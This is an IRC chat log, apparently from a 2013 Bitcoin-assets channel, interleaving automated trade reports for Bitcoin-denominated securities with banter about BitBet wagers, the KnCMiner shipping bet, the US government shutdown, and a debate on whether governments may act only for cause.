01 00:07:26 kinda funny Oct 01 00:07:34 was it verified that he is even real= Oct 01 00:07:37 [BTCTC] [CRYPTO-TRADE] 3 @ 0.175 = 0.525 BTC [+] Oct 01 00:07:37 [BTCTC] [ASICMINER-PT] 39 @ 1.22289742 = 47.693 BTC [+] {6} Oct 01 00:07:49 obv mircea_popescu because i sent a random nick highlight and we figured it out ourselves Oct 01 00:08:01 it's confirmed that he's the guy posting from the labcoin bitcointalk account, yes Oct 01 00:11:59 http://youtu.be/JFOcI8nK2xI Oct 01 00:12:00 Jupiter launch - YouTube Oct 01 00:12:19 It was confirmed Oct 01 00:14:26 http://eligius.st/~wizkid057/newstats/userstats.php/17Czc8RVL3FU5T2MLx2zLbRnpfBNgH9vFo Oct 01 00:14:45 hey Oct 01 00:14:48 yeah Oct 01 00:14:52 but how about the bitbet? Oct 01 00:14:56 well they have ONE unit Oct 01 00:15:02 well they might have 100 Oct 01 00:15:06 but have they delivered any? Oct 01 00:15:07 they need five, and ship them ;) Oct 01 00:15:19 so basicly the bet is confirmed to be no? Oct 01 00:16:00 he said we start shipping today. so… still waiting Oct 01 00:17:12 hm Oct 01 00:19:26 if nothing else TheSeven everyone appreciates the candor Oct 01 00:22:38 http://trilema.com/2013/you-have-no-potential/ Oct 01 00:22:39 You have no potential. pe Trilema - Un blog de Mircea Popescu. Oct 01 00:22:41 i feel inspired. Oct 01 00:23:25 mircea_popescu your eye is attempting to smoke a cigar Oct 01 00:23:34 i'm not sure it works that way Oct 01 00:24:35 lol Oct 01 00:24:54 [HAVELOCK] [B] [XBOND] 119 @ 0.001191 = 0.1417 BTC [+] Oct 01 00:32:01 [BTCTC] [ASICMINER-PT] 11 @ 1.21736363 = 13.391 BTC [-] {3} Oct 01 00:45:14 [BTCTC] [ASICMINER-PT] 1 @ 1.216 BTC [-] Oct 01 00:51:20 [BTCTC] [LABCOIN] 5460 @ 0.0002526 = 1.3792 BTC [+] Oct 01 01:02:32 [HAVELOCK] [HIM] 3 @ 0.11299999 = 0.339 BTC [-] Oct 01 01:04:32 [BTCTC] [COGNITIVE] 65 @ 0.09718768 = 6.3172 BTC [+] {5} Oct 01 01:23:51 [BTCTC] [CRYPTO-TRADE] 1 @ 0.165 BTC [-] Oct 01 01:26:38 what the fuck kind of country bumpkin speak is furloughing Oct 01 01:27:49 us. Oct 01 01:28:19 liek filibustering Oct 01 01:28:53 american political language share with horse husbandry Oct 01 01:29:57 [BTCTC] [FN] [BTC-GROWTH] 3 @ 0.0751 = 0.2253 BTC [-] Oct 01 01:31:21 lol Oct 01 01:32:00 [BTCTC] [COGNITIVE] 1 @ 0.13 BTC [+] Oct 01 01:33:00 what was that word to prepare a horse for sale? Oct 01 01:34:15 that involved sticking a pepper into the fundament Oct 01 01:38:09 [BTCTC] [KENILWORTH] 75 @ 0.0014 = 0.105 BTC [-] Oct 01 01:44:15 [BTCTC] [DMS.MINING] 107 @ 0.00120392 = 0.1288 BTC [-] {3} Oct 01 02:01:32 [BTCTC] [LABCOIN] 1350 @ 0.0002525 = 0.3409 BTC [-] Oct 01 02:02:33 [BTCTC] [LABCOIN] 5650 @ 0.00025229 = 1.4254 BTC [-] {2} **** BEGIN LOGGING AT Tue Oct 1 06:57:16 2013 Oct 01 06:57:31 [BTCTC] [LABCOIN] 40130 @ 0.00020827 = 8.3579 BTC [-] {13} Oct 01 06:57:52 amazing proxy! Oct 01 06:57:53 AMAZING COMPANY! Oct 01 07:00:27 $avg Oct 01 07:00:29 mircea_popescu: 132.76 Oct 01 07:05:38 [BTCTC] [LABCOIN] 6000 @ 0.00020301 = 1.2181 BTC [-] {2} Oct 01 07:08:09 mircea_popescu: you need ot review the best movie ever: Clueless Oct 01 07:08:31 http://www.rottentomatoes.com/m/clueless/ - certified fressssssh Oct 01 07:08:41 [BTCTC] [LABCOIN] 10001 @ 0.0002031 = 2.0312 BTC [+] {2} Oct 01 07:09:08 the one with alicia silverstone ? Oct 01 07:09:15 yessir! Oct 01 07:09:18 yeah. unremarkable. Oct 01 07:09:42 only becuase you hate Jane Austen :P Oct 01 07:09:47 Why you a hater?!? Oct 01 07:12:01 no, because it's hardly remarkable. yet another teenage love in the burgeois tradition movie. who cares ? Oct 01 07:12:45 [HAVELOCK] [AM100] 20 @ 0.012105 = 0.2421 BTC [-] {3} Oct 01 07:17:50 [HAVELOCK] [AM1] 3 @ 1.36999998 = 4.11 BTC [+] {2} Oct 01 07:19:52 [HAVELOCK] [NEOBEE] 680 @ 0.00294 = 1.9992 BTC [+] Oct 01 07:22:55 [HAVELOCK] [CBTC] 750 @ 0.00028001 = 0.21 BTC [-] Oct 01 07:24:57 [BTCTC] [LABCOIN] 10000 @ 0.0002016 = 2.016 BTC [-] {3} Oct 01 07:34:59 Is the US government shut down? Oct 01 07:37:21 lol Oct 01 07:38:41 lol Oct 01 07:39:14 haha Oct 01 07:44:53 http://aaanditsgone.com/ Oct 01 07:44:53 USA.gov: The U.S. Government's Official Web Portal Oct 01 07:50:23 [BTCTC] [LABCOIN] 1000 @ 0.0002101 = 0.2101 BTC [+] {2} Oct 01 07:51:24 [BTCTC] [CRYPTO-TRADE] 1 @ 0.165 BTC [-] Oct 01 07:57:30 [BTCTC] [BITVPS] 100 @ 0.00110372 = 0.1104 BTC [+] {2} Oct 01 07:58:31 [HAVELOCK] [CBTC] 500 @ 0.00028 = 0.14 BTC [-] Oct 01 08:00:39 US-Gov:~$ shutdown -h now Oct 01 08:01:34 [HAVELOCK] [AM100] 44 @ 0.01213409 = 0.5339 BTC [+] {2} Oct 01 08:02:35 [HAVELOCK] [AM1] 20 @ 1.20158001 = 24.0316 BTC [-] {8} Oct 01 08:07:40 [BTCTC] [ASICMINER-PT] 1 @ 1.2 BTC [+] Oct 01 08:15:48 [HAVELOCK] [DEALCO] 57 @ 0.00794736 = 0.453 BTC [+] {2} Oct 01 08:21:54 [BTCTC] [ASICMINER-PT] 4 @ 1.2045 = 4.818 BTC [+] {2} Oct 01 08:22:55 [HAVELOCK] [DEALCO] 42 @ 0.008 = 0.336 BTC [+] Oct 01 08:28:00 [BTCTC] [ASICMINER-PT] 4 @ 1.21925 = 4.877 BTC [+] {3} Oct 01 08:45:17 [BTCTC] [BASIC-MINING] 100 @ 0.04768599 = 4.7686 BTC [-] {4} Oct 01 09:06:48 explained: Most government workers will be furloughed.a procedure that involves halting their pay, sending them home, and then castrating them with a gelding knife in front of their spouses Oct 01 09:07:08 thank you onion news Oct 01 09:17:57 Hope that reaches congress. Oct 01 09:28:40 would be cool if anyone who works for the govt would be castrated. Oct 01 09:28:50 one step closer to spqr. Oct 01 09:40:07 oh bummer Oct 01 09:56:28 [BTCTC] [BASIC-MINING] 20 @ 0.043565 = 0.8713 BTC [-] {2} Oct 01 10:04:01 cads http://trilema.com/2013/squares-do-morals-a-porno/ you're now famous :D Oct 01 10:17:28 so china getting ready to reopen us government again Oct 01 10:18:30 http://bitbet.us/bet/541/the-current-us-goverment-shutdown-is-permanent/ Oct 01 10:18:32 BitBet - The current US goverment shutdown is permanent Oct 01 10:18:50 [BTCTC] [BFMINES] 584 @ 0.00060036 = 0.3506 BTC [+] {3} Oct 01 10:20:59 haha permanent Oct 01 10:21:53 [BTCTC] [BASIC-MINING] 30 @ 0.045 = 1.35 BTC [+] Oct 01 10:22:06 more fifa soccer ones please Oct 01 10:27:58 [BTCTC] [DMS.MINING] 100 @ 0.00120262 = 0.1203 BTC [-] {3} Oct 01 10:44:14 [MPEX] [S.MPOE] 1800 @ 0.00089743 = 1.6154 BTC [+] {2} Oct 01 10:46:16 [BTCTC] [DMS.MINING] 300 @ 0.00131233 = 0.3937 BTC [+] {2} Oct 01 11:11:42 [BTCTC] [LABCOIN] 486 @ 0.0002492 = 0.1211 BTC [+] {5} Oct 01 11:20:51 [BTCTC] [RSM] 196 @ 0.0041 = 0.8036 BTC [+] Oct 01 11:21:52 [BTCTC] [FN] [DMS.SELLING] 49 @ 0.005389 = 0.2641 BTC [+] {2} Oct 01 11:23:54 [BTCTC] [DMS.MINING] 172 @ 0.001202 = 0.2067 BTC [-] Oct 01 11:32:02 [HAVELOCK] [VTX] 2 @ 0.49011 = 0.9802 BTC [-] Oct 01 11:34:04 knc bet resolved? Oct 01 11:34:46 not yet Oct 01 11:37:16 why?! Oct 01 11:37:40 isn't it clear? Oct 01 11:38:51 it isn't important. let's compare wealth redistribution to certain kind of maternity ward Oct 01 11:38:55 instead Oct 01 11:39:20 how about not Oct 01 11:39:58 is the bet unclea3 or what? Oct 01 11:40:10 [BTCTC] [B] [CIPHERMINE.B1] 48 @ 0.00800833 = 0.3844 BTC [+] {2} Oct 01 11:40:16 but rly, waiting day or two cannot hurt Oct 01 11:40:41 well other "1st Oct" bets have resolved Oct 01 11:40:53 all but this KNC bet Oct 01 11:41:41 i don't follow it closely..afaik the other bets don't have units happily hashing Oct 01 11:42:15 just unclear to me if these units are already under full control of their owners or still in knc Oct 01 11:42:57 well theres been no messages frm customers, so... Oct 01 11:44:31 ;;bc,stats Oct 01 11:44:34 Current Blocks: 261061 | Current Difficulty: 1.4881919980509263E8 | Next Difficulty At Block: 262079 | Next Difficulty In: 1018 blocks | Next Difficulty In About: 5 days, 12 hours, 3 minutes, and 53 seconds | Next Difficulty Estimate: 178646097.108 | Estimated Percent Change: 20.04237 Oct 01 11:52:22 [BTCTC] [DMS.MINING] 2870 @ 0.00133697 = 3.8371 BTC [+] {3} Oct 01 11:56:26 [BTCTC] [B] [CIPHERMINE.B1] 448 @ 0.00809955 = 3.6286 BTC [+] {2} Oct 01 12:02:31 [BTCTC] [ASICMINER-PT] 1 @ 1.221 BTC [+] Oct 01 12:03:32 [HAVELOCK] [AM1] 1 @ 1.111 BTC [-] Oct 01 12:09:38 [BTCTC] [ASICMINER-PT] 3 @ 1.191 = 3.573 BTC [-] {2} Oct 01 12:10:39 [HAVELOCK] [AM100] 71 @ 0.0120014 = 0.8521 BTC [-] {2} Oct 01 12:10:41 [BTCTC] [ASICMINER-PT] 6 @ 1.18866666 = 7.132 BTC [-] {2} Oct 01 12:10:41 [BTCTC] [LABCOIN] 4638 @ 0.0002499 = 1.159 BTC [+] Oct 01 12:10:41 [HAVELOCK] [AM1] 30 @ 1.111 = 33.33 BTC [-] Oct 01 12:26:56 [BTCTC] [ASICMINER-PT] 1 @ 1.181 BTC [-] Oct 01 12:27:57 [HAVELOCK] [AM1] 1 @ 1.29999998 BTC [+] Oct 01 12:29:59 [BTCTC] [ASICMINER-PT] 12 @ 1.18008332 = 14.161 BTC [-] {4} Oct 01 12:37:06 [BTCTC] [ASICMINER-PT] 1 @ 1.18 BTC [-] Oct 01 12:40:09 [BTCTC] [ASICMINER-PT] 1 @ 1.17 BTC [-] Oct 01 12:43:12 [HAVELOCK] [NEOBEE] 1211 @ 0.00294 = 3.5603 BTC [+] Oct 01 13:01:30 [BTCTC] [LABCOIN] 3187 @ 0.00025 = 0.7968 BTC [+] Oct 01 13:05:34 [BTCTC] [LABCOIN] 1000 @ 0.0002326 = 0.2326 BTC [-] Oct 01 13:07:36 [BTCTC] [LABCOIN] 614 @ 0.0002326 = 0.1428 BTC [-] Oct 01 13:10:39 [HAVELOCK] [CBTC] 8000 @ 0.00030803 = 2.4642 BTC [+] {6} Oct 01 13:10:40 [HAVELOCK] [CFIG] 15 @ 0.12979996 = 1.947 BTC [+] {3} Oct 01 13:11:40 [BTCTC] [ASICMINER-PT] 4 @ 1.17 = 4.68 BTC [-] Oct 01 13:12:41 [BTCTC] [LABCOIN] 1600 @ 0.00025 = 0.4 BTC [+] {2} Oct 01 13:16:46 [BTCTC] [LABCOIN] 1750 @ 0.00023257 = 0.407 BTC [-] {3} Oct 01 13:17:46 [BTCTC] [LABCOIN] 1251 @ 0.00022576 = 0.2824 BTC [-] {2} Oct 01 13:39:49 http://www.slate.com/blogs/the_world_/2013/09/30/potential_government_shutdown_how_would_the_u_s_media_report_on_it_if_it.html Oct 01 13:39:50 Potential government shutdown: How would the U.S. media report on it if it were happening to another Oct 01 13:44:12 [BTCTC] [ASICMINER-PT] 45 @ 1.15031108 = 51.764 BTC [-] {15} Oct 01 13:45:13 [BTCTC] [LABCOIN] 6800 @ 0.000222 = 1.5096 BTC [-] {2} Oct 01 13:49:17 [BTCTC] [ASICMINER-PT] 3 @ 1.135 = 3.405 BTC [-] {2} Oct 01 13:49:17 [BTCTC] [LABCOIN] 1700 @ 0.000222 = 0.3774 BTC [-] {2} Oct 01 14:06:27 http://codinginmysleep.com/bitsyncom-asic-miners-anounced-will-be-auctioned-on-tradehill/ Oct 01 14:06:28 BitSyncom ASIC Miners Anounced: Will be Auctioned on Tradehill - Coding In My Sleep - A Bitcoin Blog Oct 01 14:06:39 fail to fail-th power Oct 01 14:07:39 http://dcm6srpdb0rbc.cloudfront.net/wp-content/uploads/2013/09/boxes.jpg lmao Oct 01 14:14:35 oh well that just puts me off buying more of thier hardware even more Oct 01 14:30:03 fail to fail-th power << word. Oct 01 14:30:16 Graet did you buy anythin recently ? Oct 01 14:31:15 it isn't important. let's compare wealth redistribution to certain kind of maternity ward << your trolling is like s ocute. Oct 01 14:34:27 https://hashfast.com/shop/babyjet/ backorder one Oct 01 14:43:18 trolling or not..i just found the simile completely appalling Oct 01 14:44:21 even children *are* being redistributed, for reasons such as neglect Oct 01 14:45:10 that's for cause. Oct 01 14:50:18 [BTCTC] [LABCOIN] 20000 @ 0.00025312 = 5.0624 BTC [+] {5} Oct 01 14:51:08 Has TAT transfered anyone's NEOBEE shares? Or is he still out of town? Not sure how long this proccess should take and I don't want to bug him if he hasn't even started. Oct 01 14:52:20 [BTCTC] [LABCOIN] 3500 @ 0.00025926 = 0.9074 BTC [+] {4} Oct 01 14:53:59 i haven't seen him these days, but! Oct 01 14:54:19 people legitimately have to travel occasionally, give it a few days Oct 01 14:54:49 bitbet? Oct 01 14:54:51 jurov you see the difference between moving children for cause (mother died, for instance) and for purpose. do you ? Oct 01 14:54:57 Anduckk hm ? Oct 01 14:55:16 It's been 8 days, that's wwhy I asked. =) Oct 01 14:55:50 Since he sent instructions and I replied the same day that is. Oct 01 14:56:02 is the knc bet unclear or why stll not solved? Oct 01 14:57:49 Anduckk probably because the mods partied hard on the bribe you sent and nobody's awake yet. Oct 01 14:58:00 Doctor_Andonuts oh. Oct 01 14:58:08 ;;seen thickasthieves Oct 01 14:58:08 thickasthieves was last seen in #bitcoin-assets 6 days, 20 hours, 21 minutes, and 8 seconds ago: Me, do drugs? Never. Oct 01 14:58:19 ;;seen tatinvestment Oct 01 14:58:19 I have not seen tatinvestment. Oct 01 14:58:21 ;;seen tatinvestments Oct 01 14:58:21 tatinvestments was last seen in #bitcoin-assets 14 weeks, 5 days, 8 hours, 14 minutes, and 40 seconds ago: * TATInvestments tries on a new hat. Oct 01 14:58:25 [BTCTC] [ASICMINER-PT] 1 @ 1.196 BTC [+] Oct 01 14:58:58 well now when he shows up ima be all dude! people's lookin fo yo cuz of your debts! Oct 01 15:00:27 [HAVELOCK] [XBOND] [PAID] 0.69348300 BTC to 1`386`966 shares, 50 satoshi per share Oct 01 15:00:57 mircea_popescu in many cases the difference is not clear - will the child hurt less when it stays with abusive mother or when it goes away? Oct 01 15:00:59 is thickasthieves the new scammor Oct 01 15:01:09 you seem as if that can be decided with mathemtical clarity Oct 01 15:01:19 jurov the difference is very clear : if it is for cause, then it's one thing. if it's for a purpose then it's moral hazard. Oct 01 15:01:39 ;;seen TAT_Investments Oct 01 15:01:40 TAT_Investments was last seen in #bitcoin-assets 1 day, 14 hours, 24 minutes, and 16 seconds ago: i'm in cyprus atm Oct 01 15:02:29 [BTCTC] [ASICMINER-PT] 3 @ 1.20833333 = 3.625 BTC [+] {2} Oct 01 15:02:52 and if the distinction is meaningless to you : a cause is in the past. a purpose is in the future. Oct 01 15:02:57 entirely different beasts. Oct 01 15:03:30 [BTCTC] [FN] [BTC-GROWTH] 10 @ 0.084 = 0.84 BTC [+] Oct 01 15:04:31 [BTCTC] [FN] [BTC-GROWTH] 240 @ 0.084 = 20.16 BTC [+] Oct 01 15:05:32 [BTCTC] [FN] [BTC-GROWTH] 140 @ 0.08562857 = 11.988 BTC [+] {2} Oct 01 15:09:36 [BTCTC] [ASICMINER-PT] 2 @ 1.136 = 2.272 BTC [-] {2} Oct 01 15:09:50 mircea_popescu: If you limit yourself squarely to cause then all you can is react. Oct 01 15:10:51 indeed. the problem of divine agency (how god managed to create the world w/o becoming the devil) is the biggest problem scholastics failed to solve. Oct 01 15:10:58 in general, initiative is the work of the devil. Oct 01 15:13:09 ? Oct 01 15:13:58 they came up with this constructed agency which was somehow magically devoid of will, intentionality or choice. obviously a lame duck (even to them), but otherwise the problem is irresolvable. Oct 01 15:14:41 [BTCTC] [BFMINES] 442 @ 0.00055678 = 0.2461 BTC [-] {2} Oct 01 15:15:01 notably the governments of today attempt exactly the same magic. "science" is now supposed to be the will-less, intention-less, choice-less engine that allows government agency without sin. at least in theory. Oct 01 15:15:08 isn't particularly convincing to anyone, but anyway. Oct 01 15:19:46 [BTCTC] [LABCOIN] 1721 @ 0.00024 = 0.413 BTC [-] Oct 01 15:20:14 irrespective of that, the best and most general formulation of the limits placed on governments (all, no exceptions) by the social contract is that they may only act for cause (ie, react). agency is strictly reserved to the individual, and in that the individual is superior to the state, ie, more of a person. Oct 01 15:21:09 oh, good luck with that Oct 01 15:21:19 hey. morals are what they are. Oct 01 15:25:05 dub greatg link lol Oct 01 15:26:14 also in the news, Oct 01 15:26:14 http://www.bbc.co.uk/news/uk-england-24281192 Oct 01 15:26:15 BBC News - 'TomTato' tomato and potato plant unveiled in UK Oct 01 15:34:01 [BTCTC] [ASICMINER-PT] 45 @ 1.13417777 = 51.038 BTC [-] {5} Oct 01 15:36:03 [BTCTC] [CRYPTO-TRADE] 1 @ 0.165 BTC [-] Oct 01 15:56:23 [BTCTC] [ASICMINER-PT] 2 @ 1.133 = 2.266 BTC [-] Oct 01 16:06:33 [BTCTC] [ASICMINER-PT] 4 @ 1.133 = 4.532 BTC [-] Oct 01 16:12:39 [BTCTC] [ASICMINER-PT] 7 @ 1.183 = 8.281 BTC [+] {3} Oct 01 16:21:48 [BTCTC] [FIMB] 98 @ 0.0075 = 0.735 BTC [-] Oct 01 16:23:50 [BTCTC] [FN] [DMS.SELLING] 20 @ 0.00505 = 0.101 BTC [-] Oct 01 16:23:51 [BTCTC] [BITVPS] 100 @ 0.00114474 = 0.1145 BTC [+] {4} Oct 01 16:24:51 [BTCTC] [BASIC-MINING] 10 @ 0.0435 = 0.435 BTC [-] {2} Oct 01 16:24:52 [BTCTC] [ASICMINER-PT] 5 @ 1.133 = 5.665 BTC [-] {3} Oct 01 16:25:53 [BTCTC] [ASICMINER-PT] 1 @ 1.132 BTC [-] Oct 01 16:25:53 [BTCTC] [RSM] 90 @ 0.0033 = 0.297 BTC [-] Oct 01 16:26:52 [BTCTC] [ASICMINER-PT] 12 @ 1.12166666 = 13.46 BTC [-] {5} Oct 01 16:27:54 [BTCTC] [DMS.MINING] 857 @ 0.00134561 = 1.1532 BTC [+] {4} Oct 01 16:32:59 [BTCTC] [B] [CIPHERMINE.B1] 148 @ 0.008 = 1.184 BTC [-] Oct 01 16:32:59 [BTCTC] [PAJKA.BOND] 29 @ 0.012 = 0.348 BTC [-] {3} Oct 01 16:35:01 [BTCTC] [PAJKA.BOND] 18 @ 0.01 = 0.18 BTC [-] Oct 01 16:36:02 [HAVELOCK] [AM100] 10 @ 0.01276999 = 0.1277 BTC [-] Oct 01 16:40:06 [HAVELOCK] [AM100] 38 @ 0.01182639 = 0.4494 BTC [-] {5} Oct 01 16:47:13 [BTCTC] [ASICMINER-PT] 72 @ 1.10088888 = 79.264 BTC [-] {7} Oct 01 16:48:14 [HAVELOCK] [B] [XBOND] 1000 @ 0.00120074 = 1.2007 BTC [+] {2} Oct 01 16:51:52 ;;bc,stats Oct 01 16:51:55 Current Blocks: 261110 | Current Difficulty: 1.4881919980509263E8 | Next Difficulty At Block: 262079 | Next Difficulty In: 969 blocks | Next Difficulty In About: 4 days, 22 hours, 39 minutes, and 11 seconds | Next Difficulty Estimate: 180780476.079 | Estimated Percent Change: 21.47658 Oct 01 16:57:19 asicminer dying in the asshole Oct 01 16:58:30 awww Oct 01 16:59:46 <+AssetBot> [G.ASICMINER-PT] 2 @ 0.81110000 = 1.62220000 [-] Oct 01 17:00:40 :o Oct 01 17:00:53 well it's fractional reserve shares, does it count? Oct 01 17:01:15 anyway, http://bitbet.us/bet/534/price-of-asicminer-2-btc-per-share/?ref=1Eck6cgGzEb9N42CFhcsCBQhZQStoJbHRK Oct 01 17:02:05 heh Oct 01 17:02:51 thats a big no Oct 01 17:06:13 there's like a block every minute atm Oct 01 17:11:37 [BTCTC] [ASICMINER-PT] 2 @ 1.1 = 2.2 BTC [-] Oct 01 17:13:39 [BTCTC] [ASICMINER-PT] 3 @ 1.159 = 3.477 BTC [+] Oct 01 17:19:45 [BTCTC] [ASICMINER-PT] 1 @ 1.1 BTC [-] Oct 01 17:19:45 [BTCTC] [KENILWORTH] 500 @ 0.0013198 = 0.6599 BTC [-] {2} Oct 01 17:21:47 [BTCTC] [ASICMINER-PT] 1 @ 1.165 BTC [+] Oct 01 17:29:06 http://yro.slashdot.org/story/13/10/01/0346246/sinkhole-sucks-brains-from-wasteful-bitcoin-mining-botnet Oct 01 17:29:07 Sinkhole Sucks Brains From Wasteful Bitcoin Mining Botnet - Slashdot Oct 01 17:33:13 ya im sure they made a ton cpu mining. Oct 01 17:51:17 [BTCTC] [LABCOIN] 500 @ 0.0002499 = 0.125 BTC [+] Oct 01 17:52:18 [BTCTC] [ASICMINER-PT] 1 @ 1.12 BTC [-] Oct 01 17:57:23 [HAVELOCK] [AM1] 1 @ 1.25 BTC [-] Oct 01 18:12:37 [BTCTC] [LABCOIN] 1820 @ 0.0002302 = 0.419 BTC [-] Oct 01 18:13:38 [BTCTC] [ASICMINER-PT] 30 @ 1.11266665 = 33.38 BTC [-] {4} Oct 01 18:16:29 http://nymag.com/daily/intelligencer/2013/09/gta-vs-stock-trading-platform.html Oct 01 18:19:44 [BTCTC] [LABCOIN] 3784 @ 0.0002399 = 0.9078 BTC [+] Oct 01 18:22:47 [HAVELOCK] [HIM] 1 @ 0.13 BTC [+] Oct 01 18:28:53 [BTCTC] [ASICMINER-PT] 4 @ 1.1 = 4.4 BTC [-] Oct 01 18:28:53 [BTCTC] [LABCOIN] 24662 @ 0.00025888 = 6.3845 BTC [+] {6} Oct 01 18:31:39 ;;bc,convert eur Oct 01 18:31:40 1 BTC = 140.95823 U.S. dollars = 104.243625 Euros Oct 01 18:33:31 hmmm Oct 01 18:33:39 still the bitbet of KNC isn't solved??? Oct 01 18:34:02 oh now it is Oct 01 18:34:43 i think it got solved immeditely after my "hmmm" =P Oct 01 18:35:16 Resolved: Oct 01 18:35:16 15 hours 34 minutes ago Oct 01 18:36:17 yeah Oct 01 18:36:26 but well i don't see my winning sent to my wallet yet Oct 01 18:36:29 not even unconfirmed Oct 01 18:36:42 it takes some time Oct 01 18:36:44 and it was pending resolution 5mins ago so.......... Oct 01 18:37:00 the bet resolution is not necessarily bound to payout Oct 01 18:37:09 afaik that's a seperate process Oct 01 18:39:03 [BTCTC] [LABCOIN] 2000 @ 0.00024 = 0.48 BTC [-] Oct 01 18:44:45 6.53btc yay Oct 01 18:44:53 nah, winners payouts have been deprecated Oct 01 18:46:39 why? ain't no filthy immoral redistribution? Oct 01 18:47:08 its better roi if we dont pay at all Oct 01 18:48:44 fuck, should have placed a bet "bitbet stops paying out" .. oh wait Oct 01 18:48:49 lol Oct 01 18:49:07 hehe Oct 01 18:50:03 lol Oct 01 18:51:11 o jurov was it your bet ? Oct 01 18:51:45 26-09-13 18:35 No 223 1.00000000 12KYr 0.99938408 1KSJa Oct 01 18:51:47 cute lol. Oct 01 18:52:24 yes mine Oct 01 18:53:00 wd. Oct 01 18:56:21 [BTCTC] [ASICMINER-PT] 1 @ 1.091 BTC [-] Oct 01 18:57:22 [BTCTC] [ASICMINER-PT] 28 @ 1.09 = 30.52 BTC [-] Oct 01 18:59:24 [BTCTC] [ASICMINER-PT] 5 @ 1.0902 = 5.451 BTC [+] {2} Oct 01 19:04:29 [BTCTC] [LABCOIN] 72861 @ 0.00023217 = 16.9161 BTC [-] {2} Oct 01 19:06:32 when does btctco close Oct 01 19:06:42 and why are people still buying labcoin Oct 01 19:08:14 that's a ~100-200btc loss Oct 01 19:13:10 "loss" Oct 01 19:13:16 unrealised gains aren't losses. Oct 01 19:19:25 https://scontent-b-ams.xx.fbcdn.net/hphotos-prn2/q71/1378064_10101330823086797_428225181_n.jpg Oct 01 19:19:29 wow that knc bet is going to butthurt people to death Oct 01 19:19:36 aka nice to have russian friends on fb Oct 01 19:20:23 russians use vk Oct 01 19:20:45 [BTCTC] [LABCOIN] 10240 @ 0.00023318 = 2.3878 BTC [+] {2} Oct 01 19:21:46 [MPEX] [S.MPOE] 338 @ 0.00089705 = 0.3032 BTC [-] Oct 01 19:21:46 [BTCTC] [ASICMINER-PT] 1 @ 1.091 BTC [+] Oct 01 19:21:46 [HAVELOCK] [AM1] 1 @ 1.28999999 BTC [+] Oct 01 19:22:14 pankkake any threads on the forum about it yet Oct 01 19:22:47 [BTCTC] [ASICMINER-PT] 5 @ 1.09 = 5.45 BTC [-] Oct 01 19:24:03 pankkake why ? Oct 01 19:25:50 [BTCTC] [ASICMINER-PT] 4 @ 1.10075 = 4.403 BTC [+] {2} Oct 01 19:26:51 [BTCTC] [ASICMINER-PT] 2 @ 1.1 = 2.2 BTC [-] Oct 01 19:27:41 the "why" is obvious, they'll argue things unrelated to the bet Oct 01 19:28:02 I hope you're sure no one got stuff shipped on the 30th though Oct 01 19:28:53 [BTCTC] [FN] [DMS.SELLING] 19 @ 0.00537368 = 0.1021 BTC [+] {3} Oct 01 19:28:53 [BTCTC] [LABCOIN] 1600 @ 0.0002324 = 0.3718 BTC [-] {2} Oct 01 19:28:53 [BTCTC] [ASICMINER-PT] 5 @ 1.1 = 5.5 BTC [-] Oct 01 19:29:26 5. Oct 01 19:29:53 [BTCTC] [ASICMINER-PT] 1 @ 1.1 BTC [-] Oct 01 19:29:53 [BTCTC] [BASIC-MINING] 10 @ 0.04273 = 0.4273 BTC [-] {2} Oct 01 19:30:53 they would ludly announce shipping if they did. now if they said "we actually shipped on thursday" it would be very suspicious Oct 01 19:30:57 *loudly Oct 01 19:31:05 it'd be kinda bflish Oct 01 19:31:31 all I'm saying is that the resolution is a little bit too quick Oct 01 19:32:45 hahaha...did you read a log? there was a complaint why it takes so long this very morning Oct 01 19:33:13 doesn't make it right Oct 01 19:35:53 i don't see it. zero reports a day after cutoff. by now it's too late. Oct 01 19:36:15 https://bitcointalk.org/index.php?topic=170332.msg3277088#msg3277088 so, shipping a day late (if they ship) Oct 01 19:36:16 Swedish ASIC miner company kncminer.com Oct 01 19:37:00 [BTCTC] [ASICMINER-PT] 1 @ 1.1 BTC [-] Oct 01 19:38:01 [BTCTC] [ASICMINER-PT] 3 @ 1.1 = 3.3 BTC [-] Oct 01 19:38:20 so earliest delivery friday. Oct 01 19:39:12 but it's shipping date that counts, not delivery date, right? Oct 01 19:39:31 you can't bet on the postal system being efficient Oct 01 19:41:59 that'd be knc's problem. Oct 01 19:42:05 [BTCTC] [ASICMINER-PT] 4 @ 1.1 = 4.4 BTC [-] Oct 01 19:42:12 you can't hold bets for three months on the theory that who knows, maybe the post office is still delivering. Oct 01 19:42:34 of course not - but you hold it if they provide a postal tracking number Oct 01 19:42:43 for all i care they can drive to their customers personally and make delivery. Oct 01 19:42:56 you can, but unless the bet says so you won't. Oct 01 19:47:00 no local pickup is probably the most telling Oct 01 19:56:20 [HAVELOCK] [HIM] 2 @ 0.125 = 0.25 BTC [-] Oct 01 20:02:26 [BTCTC] [BASIC-MINING] 3 @ 0.0489 = 0.1467 BTC [+] Oct 01 20:05:29 [HAVELOCK] [HIM] 2 @ 0.13 = 0.26 BTC [+] Oct 01 20:10:39 yay Oct 01 20:10:44 received bitbet payment Oct 01 20:12:56 pankkake Oct 01 20:12:59 did you bet on this one? Oct 01 20:13:24 no Oct 01 20:15:39 [BTCTC] [CRYPTO-TRADE] 9 @ 0.175 = 1.575 BTC [+] Oct 01 20:16:40 [BTCTC] [CRYPTO-TRADE] 4 @ 0.175 = 0.7 BTC [+] Oct 01 20:18:42 [MPEX] [S.MPOE] 1400 @ 0.00089238 = 1.2493 BTC [-] Oct 01 20:29:39 http://bitbet.us/bet/472/kncminer-will-deliver-asic-devices-before-october-1st/#c1512 Oct 01 20:29:42 loller Oct 01 20:29:44 BitBet - KnCMiner will deliver ASIC devices before October 1st Oct 01 20:31:40 lol Oct 01 20:32:13 http://bitbet.us/bet/541/the-current-us-goverment-shutdown-is-permanent/ Oct 01 20:32:14 BitBet - The current US goverment shutdown is permanent Oct 01 20:32:17 Some odd wording there... Oct 01 20:32:27 >26 days == permanent? Oct 01 20:33:54 TomServo i guess the reasoning is that if it stays shutdown that long it's never coming back. Oct 01 20:34:38 TomServo from neowin? :o Oct 01 20:34:58 [HAVELOCK] [NEOBEE] 55 @ 0.00290108 = 0.1596 BTC [-] {5} Oct 01 20:35:07 BigBitz: Negative. Oct 01 20:35:10 np. Oct 01 20:36:00 [HAVELOCK] [AM100] 33 @ 0.01265846 = 0.4177 BTC [-] {2} Oct 01 20:36:02 mircea_popescu: I think the longest was 21 days. Still seems odd to me. Oct 01 20:43:06 [BTCTC] [LABCOIN] 1000 @ 0.000245 = 0.245 BTC [-] Oct 01 20:46:00 $avg Oct 01 20:46:01 mircea_popescu: 132.40 Oct 01 20:47:10 [BTCTC] [LABCOIN] 6419 @ 